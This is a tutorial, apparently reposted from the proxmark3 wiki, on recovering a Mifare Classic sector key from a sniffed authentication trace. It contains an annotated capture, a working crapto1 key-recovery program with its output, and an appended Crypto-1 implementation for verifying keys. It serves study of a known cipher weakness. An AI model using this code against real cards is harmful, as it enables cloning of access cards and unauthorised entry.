GeZhi Electronic Co.Ltd.


Getting the sector key of a Mifare card

Author : xfpga Date : 2012-12-12 12:28:59

Getting the sector key of a Mifare card (reproduced from the proxmark3 project wiki on Google Code)

Snooping on Mifare communications

This is a working example of how the sector keys of Mifare Classic cards can be recovered with a Proxmark3, using the "crapto1" package found on Google Code.

The trace below was taken with a hi14asnoop session followed by hf 14a list; it shows the beginning of the authentication and encryption protocol.

Each line reads: + <time since the previous frame> : <byte count> : [TAG] <bytes>, with the comment on the right. A "!" after a byte marks a parity error as seen by the Proxmark3. From the reader nonce on, bytes are flagged more or less at random: Crypto-1 encrypts the parity bits as well, so about half of them look wrong to a plain parity check. These flags are expected, not a sign of a bad capture, and the "!" are simply dropped when the values are read out.

Commands                                        Comment
+ 561882 : 1 : 26                               REQA
+     64 : 2 : TAG 04 00                        ATQA (answer to REQA)
+  10217 : 2 : 93 20                            SELECT, cascade level 1 (anticollision)
+     64 : 5 : TAG 9c 59 9b 32 6c               UID + BCC; the card's UID is therefore 9c 59 9b 32
+  12313 : 9 : 93 70 9c 59 9b 32 6c 6b 30       SELECT with UID (+ CRC)
+     64 : 3 : TAG 08 b6 dd                     SAK 08 = Mifare Classic 1K (+ CRC)
+ 923318 : 4 : 60 00 f5 7b                      AUTH with key A (command 60), block 00 (+ CRC)
+    112 : 4 : TAG 82 a4 16 6c                  Tag challenge (nt, "nonce tag"), sent in the clear
+   6985 : 8 : a1 e4 ! 58 ce ! 6e ea ! 41 e0 !  nr XOR ks1 (reader nonce, encrypted, 4 bytes), followed by
                                                ar XOR ks2 (reader's answer to nt, encrypted, 4 bytes)
+     64 : 4 : TAG 5c ! ad f4 39 !              at XOR ks3 (tag's answer, encrypted, 4 bytes)


In order to extract the key for sector 0 from the exchange, we need the following elements:

  • Tag UID
  • Tag challenge (nt), which must be visible in the clear: this is the case for the first authentication of a session, whereas a nested authentication to a further sector sends nt encrypted and needs a different attack
  • Reader challenge, encrypted (nr XOR ks1; nr_enc in the program below)
  • Reader response, encrypted (ar XOR ks2; reader_response in the program below)
  • Tag response, encrypted (at XOR ks3; tag_response in the program below)

In the example above (bytes taken from the trace in wire order, parity flags dropped):

  • UID        : 0x9c599b32
  • nt         : 0x82a4166c
  • nr XOR ks1 : 0xa1e458ce
  • ar XOR ks2 : 0x6eea41e0
  • at XOR ks3 : 0x5cadf439

Those can then be used in the following "crapto1" test program:

// Test-file: test2.c
#include <stdio.h>
#include <stdint.h>
#include "crapto1.h"

int main(void)
{
	struct Crypto1State *revstate;
	uint64_t lfsr;

	/* Values read from the trace above (parity flags dropped). */
	uint32_t uid             = 0x9c599b32;
	uint32_t tag_challenge   = 0x82a4166c;   /* nt */
	uint32_t nr_enc          = 0xa1e458ce;   /* nr XOR ks1 */
	uint32_t reader_response = 0x6eea41e0;   /* ar XOR ks2 */
	uint32_t tag_response    = 0x5cadf439;   /* at XOR ks3 */

	/* ar = suc64(nt) and at = suc96(nt) are predictable from nt alone, so the
	 * two encrypted answers give away two full keystream words. */
	uint32_t ks2 = reader_response ^ prng_successor(tag_challenge, 64);
	uint32_t ks3 = tag_response    ^ prng_successor(tag_challenge, 96);

	printf("nt': %08x\n", prng_successor(tag_challenge, 64));
	printf("nt'': %08x\n", prng_successor(tag_challenge, 96));
	printf("ks2: %08x\n", ks2);
	printf("ks3: %08x\n", ks3);

	/* Recover the cipher state from the two keystream words, then roll the LFSR
	 * back over everything clocked in since initialisation: the two answer words
	 * (no input), the reader nonce (encrypted input) and uid XOR nt (plain
	 * input). What is left in the register is the key.
	 * Newer crapto1 releases (and the copy in the proxmark3 tree) name these
	 * lfsr_recovery64() and lfsr_rollback_word(). */
	revstate = lfsr_recovery(ks2, ks3);
	lfsr_rollback(revstate, 0, 0);
	lfsr_rollback(revstate, 0, 0);
	lfsr_rollback(revstate, nr_enc, 1);
	lfsr_rollback(revstate, uid ^ tag_challenge, 0);
	crypto1_get_lfsr(revstate, &lfsr);
	crypto1_destroy(revstate);

	/* Print the key most significant byte first, i.e. in the order it is written
	 * on the card. Reading the uint64_t through a byte pointer, as the original
	 * did, prints it little-endian, which only looks right for a symmetric key
	 * such as ff ff ff ff ff ff. */
	printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",
	       (unsigned)(lfsr >> 40) & 0xff, (unsigned)(lfsr >> 32) & 0xff,
	       (unsigned)(lfsr >> 24) & 0xff, (unsigned)(lfsr >> 16) & 0xff,
	       (unsigned)(lfsr >>  8) & 0xff, (unsigned) lfsr        & 0xff);

	return 0;
}

Then compile it together with the two source files of the crapto1 package:

$ gcc -o test2 test2.c crapto1.c crypto1.c

And run it like this:

$ ./test2
nt': 8d65734b
nt'': 9a427b20
ks2: e38f32ab
ks3: c6ef8f19
Found Key: [ff ff ff ff ff ff]

(ff ff ff ff ff ff is the factory default key of an unprogrammed Mifare Classic card.)
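The key found by test2 can be checked against the trace independently of crapto1. The block below is an added example, not part of the original page and not crapto1's code: a minimal Crypto-1 (output filter, 48-bit LFSR and the card's 16-bit nonce generator) that runs the tag side of the handshake above with a candidate key and verifies that it reproduces the encrypted {ar} and {at} bytes seen on the wire; it also checks that the sniffed nt is a genuine tag nonce before anything else is attempted. The function and type names (c1_*, prng_succ, nonce_is_valid, c1_keystream_word, key_matches_trace, struct auth_trace, TRACE) are this example's own, and the values in TRACE are copied from the listing above.

```c
/* Added example, not from the page or from crapto1: a minimal Crypto-1 used to replay
 * the captured handshake. Names (c1_*, prng_succ, auth_trace, TRACE, ...) are ours. */
#include <stdint.h>
#include <stdio.h>
#define BIT(x, n)    (((x) >> (n)) & 1)
#define BEBIT(x, n)  BIT(x, (n) ^ 24)   /* over-the-air bit order: bytes MSB-first, bits LSB-first */
#define LF_POLY_ODD  0x29CE5C           /* Crypto-1 feedback taps, split over the odd/even halves */
#define LF_POLY_EVEN 0x870804

struct c1_state   { uint32_t odd, even; };                      /* 48-bit LFSR as two 24-bit halves */
struct auth_trace { uint32_t uid, nt, nr_enc, ar_enc, at_enc; };
/* Values copied from the trace above (parity flags dropped). */
static const struct auth_trace TRACE = { 0x9c599b32, 0x82a4166c, 0xa1e458ce, 0x6eea41e0, 0x5cadf439 };

static int parity32(uint32_t x) { x ^= x >> 16; x ^= x >> 8; x ^= x >> 4; return BIT(0x6996, x & 0xf); }
static uint32_t swap32(uint32_t x) { return x >> 24 | (x >> 8 & 0xff00) | (x << 8 & 0xff0000) | x << 24; }

/* The 20-to-1 non-linear output filter, applied to the odd half. */
static int c1_filter(uint32_t x)
{
    uint32_t f;
    f  = 0xf22c0 >> (x       & 0xf) & 16;
    f |= 0x6c9c0 >> (x >>  4 & 0xf) &  8;
    f |= 0x3c8b0 >> (x >>  8 & 0xf) &  4;
    f |= 0x1e458 >> (x >> 12 & 0xf) &  2;
    f |= 0x0d938 >> (x >> 16 & 0xf) &  1;
    return BIT(0xEC57E80A, f);
}

/* Load a 48-bit key (most significant byte = key byte 0 as written on the card). */
static void c1_init(struct c1_state *s, uint64_t key)
{
    s->odd = s->even = 0;
    for (int i = 47; i > 0; i -= 2) {
        s->odd  = s->odd  << 1 | BIT(key, (i - 1) ^ 7);
        s->even = s->even << 1 | BIT(key, i ^ 7);
    }
}

/* One clock: emit a keystream bit, then shift the input bit (decrypted first when
 * is_encrypted is set) plus the feedback into the register; the halves alternate. */
static uint8_t c1_bit(struct c1_state *s, uint8_t in, int is_encrypted)
{
    uint8_t ks = (uint8_t)c1_filter(s->odd);
    uint32_t feedin = (ks & !!is_encrypted) ^ !!in;
    feedin ^= LF_POLY_ODD & s->odd;
    feedin ^= LF_POLY_EVEN & s->even;
    s->even = s->even << 1 | parity32(feedin);
    uint32_t t = s->odd; s->odd = s->even; s->even = t;
    return ks;
}

static uint32_t c1_word(struct c1_state *s, uint32_t in, int is_encrypted)
{
    uint32_t ks = 0;
    for (int i = 0; i < 32; i++)
        ks |= (uint32_t)c1_bit(s, BEBIT(in, i), is_encrypted) << (i ^ 24);
    return ks;
}

/* The card's 16-bit nonce LFSR (x^16 + x^14 + x^13 + x^11 + 1): nt advanced by n clocks. */
static uint32_t prng_succ(uint32_t x, unsigned n)
{
    x = swap32(x);
    while (n--)
        x = x >> 1 | (x >> 16 ^ x >> 18 ^ x >> 19 ^ x >> 21) << 31;
    return swap32(x);
}

/* A genuine nonce is 32 consecutive LFSR outputs, so running the generator 16 clocks
 * from its first half must reproduce the whole nonce. A sniffed nt that fails this is
 * a garbled frame or a card with a different generator, and recovery will not work. */
static int nonce_is_valid(uint32_t nt) { return prng_succ(nt >> 16, 16) == nt; }

/* Tag side of the handshake with a candidate key; returns keystream word n
 * (1 = ks1 over {nr}, 2 = ks2 over {ar}, 3 = ks3 over {at}). */
static uint32_t c1_keystream_word(uint64_t key, const struct auth_trace *t, int n)
{
    struct c1_state s;
    c1_init(&s, key);
    c1_word(&s, t->uid ^ t->nt, 0);            /* uid XOR nt enters in the clear; keystream discarded */
    uint32_t ks = c1_word(&s, t->nr_enc, 1);   /* {nr} is decrypted on its way into the LFSR */
    if (n == 1) return ks;
    ks = c1_word(&s, 0, 0);                    /* from here nothing is fed back: pure keystream */
    return n == 2 ? ks : c1_word(&s, 0, 0);
}

/* Does the key reproduce the encrypted answers {ar} and {at} seen on the wire? */
static int key_matches_trace(uint64_t key, const struct auth_trace *t)
{
    return (prng_succ(t->nt, 64) ^ c1_keystream_word(key, t, 2)) == t->ar_enc
        && (prng_succ(t->nt, 96) ^ c1_keystream_word(key, t, 3)) == t->at_enc;
}

int main(void)
{
    uint64_t key = 0xFFFFFFFFFFFFULL;   /* the key test2 recovered */
    printf("nt is a valid tag nonce: %s\n", nonce_is_valid(TRACE.nt) ? "yes" : "no");
    printf("nr (decrypted): %08x\n", TRACE.nr_enc ^ c1_keystream_word(key, &TRACE, 1));
    printf("ks2: %08x  ks3: %08x\n", c1_keystream_word(key, &TRACE, 2), c1_keystream_word(key, &TRACE, 3));
    printf("key reproduces {ar} and {at}: %s\n", key_matches_trace(key, &TRACE) ? "yes" : "no");
    return 0;
}
```

Compile with gcc -std=c99 (any file name will do). With the key ff ff ff ff ff ff it prints the same ks2 and ks3 as test2 and reports that {ar} and {at} match; any other key fails the comparison, so this is a cheap end-to-end check of a recovered key before touching the card again. The nonce check is worth running first: a capture whose nt is not a valid generator output will not yield a usable key from the recovery step either, it just fails less visibly.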


You can also do this with the GUI software; the procedure is the same.